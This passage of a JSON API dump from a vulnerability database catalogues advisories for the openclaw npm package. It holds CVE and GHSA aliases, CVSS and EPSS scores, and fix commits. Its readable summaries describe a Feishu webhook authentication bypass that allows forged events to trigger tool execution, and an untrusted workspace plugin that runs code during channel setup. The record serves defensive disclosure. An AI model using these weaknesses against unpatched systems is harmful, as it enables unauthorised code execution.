vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41303","GHSA-98hh-7ghg-x6rq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u9cw-crg5-1kbs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90988?format=json","vulnerability_id":"VCID-u9ja-dgsh-yug2","summary":"Duplicate Advisory: OpenClaw: Feishu webhook mode accepted forged events when only `verificationToken` was configured\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-g353-mgv3-8pcj. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 contains an authentication bypass vulnerability in Feishu webhook mode when only verificationToken is configured without encryptKey, allowing acceptance of forged events. Unauthenticated network attackers can inject forged Feishu events and trigger downstream tool execution by reaching the webhook endpoint.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token"},{"reference_url":"https://github.com/advisories/GHSA-vjqw-w5jr-g9w5","reference_id":"GHSA-vjqw-w5jr-g9w5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vjqw-w5jr-g9w5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-vjqw-w5jr-g9w5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u9ja-dgsh-yug2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89510?format=json","vulnerability_id":"VCID-una1-gxkk-t3bp","summary":"OpenClaw: Untrusted workspace channel shadows could execute during built-in channel setup\n## Summary\n\nBefore OpenClaw 2026.4.2, built-in channel setup and login could resolve an untrusted workspace channel shadow before the plugin was explicitly trusted. A malicious workspace plugin that claimed a bundled channel id could execute during channel setup even while still disabled.\n\n## Impact\n\nA cloned workspace could turn channel setup for a built-in channel into unintended in-process code execution from an untrusted workspace plugin. This bypassed the intended workspace-plugin trust boundary during setup and login.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0` — ignore untrusted workspace channel shadows during setup resolution\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41295","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03582","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03589","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03575","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41295"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"}],"url":"https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41295","reference_id":"CVE-2026-41295","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41295"},{"reference_url":"https://github.com/advisories/GHSA-2qrv-rc5x-2g2h","reference_id":"GHSA-2qrv-rc5x-2g2h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2qrv-rc5x-2g2h"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup","reference_id":"openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerabili